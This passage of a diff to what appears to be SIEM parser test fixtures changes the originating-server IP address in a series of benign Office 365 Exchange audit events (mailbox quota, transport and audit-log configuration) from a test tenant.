"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d16f181c-257c-4d40-45e1-08d7adfc0c02\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -2780,7 +2780,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -2854,7 +2854,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:42\",\"ExternalAccess\":true,\"Id\":\"27fdc2ec-edbd-445c-92bd-08d7ac0f1dc6\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"UMGrammar\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"MaxSendSize\",\"Value\":\"1 GB (1,073,741,824 bytes)\"},{\"Name\":\"MailRouting\",\"Value\":\"True\"},{\"Name\":\"MessageTracking\",\"Value\":\"True\"},{\"Name\":\"OMEncryption\",\"Value\":\"True\"},{\"Name\":\"OABGen\",\"Value\":\"True\"},{\"Name\":\"ClientExtensions\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\"},{\"Name\":\"GMGen\",\"Value\":\"True\"},{\"Name\":\"SuiteServiceStorage\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:42\",\"ExternalAccess\":true,\"Id\":\"27fdc2ec-edbd-445c-92bd-08d7ac0f1dc6\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"UMGrammar\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"MaxSendSize\",\"Value\":\"1 GB (1,073,741,824 bytes)\"},{\"Name\":\"MailRouting\",\"Value\":\"True\"},{\"Name\":\"MessageTracking\",\"Value\":\"True\"},{\"Name\":\"OMEncryption\",\"Value\":\"True\"},{\"Name\":\"OABGen\",\"Value\":\"True\"},{\"Name\":\"ClientExtensions\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\"},{\"Name\":\"GMGen\",\"Value\":\"True\"},{\"Name\":\"SuiteServiceStorage\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -2866,7 +2866,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "Force", @@ -2928,7 +2928,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -2940,7 +2940,7 @@ "Operation": "Set-AdminAuditLogConfig", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -2970,7 +2970,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:52\",\"ExternalAccess\":true,\"Id\":\"fd804781-7d7f-4d3a-1ef0-08d7ac0f47e4\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"HygieneSuite\",\"Value\":\"Premium\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:52\",\"ExternalAccess\":true,\"Id\":\"fd804781-7d7f-4d3a-1ef0-08d7ac0f47e4\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"HygieneSuite\",\"Value\":\"Premium\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -2982,7 +2982,7 @@ "Operation": "Set-TransportConfig", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -3008,7 +3008,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:52\",\"ExternalAccess\":true,\"Id\":\"8a3c4f54-f2de-4717-dd56-08d7ac0f23be\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:52\",\"ExternalAccess\":true,\"Id\":\"8a3c4f54-f2de-4717-dd56-08d7ac0f23be\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -3020,7 +3020,7 @@ "Operation": "Set-TransportConfig", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -3046,7 +3046,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:06\",\"ExternalAccess\":true,\"Id\":\"627aa8ff-1411-475d-d202-08d7ac0f08a5\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\ExchangeAssistance\",\"Operation\":\"New-ExchangeAssistanceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:06\",\"ExternalAccess\":true,\"Id\":\"627aa8ff-1411-475d-d202-08d7ac0f08a5\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\ExchangeAssistance\",\"Operation\":\"New-ExchangeAssistanceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -3058,7 +3058,7 @@ "Operation": "New-ExchangeAssistanceConfig", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -3084,7 +3084,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"425128e3-4281-42f6-4ec7-08d7adfc0acd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"425128e3-4281-42f6-4ec7-08d7adfc0acd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -3096,7 +3096,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "ProhibitSendReceiveQuota", @@ -3178,7 +3178,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -3190,7 +3190,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -3264,7 +3264,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 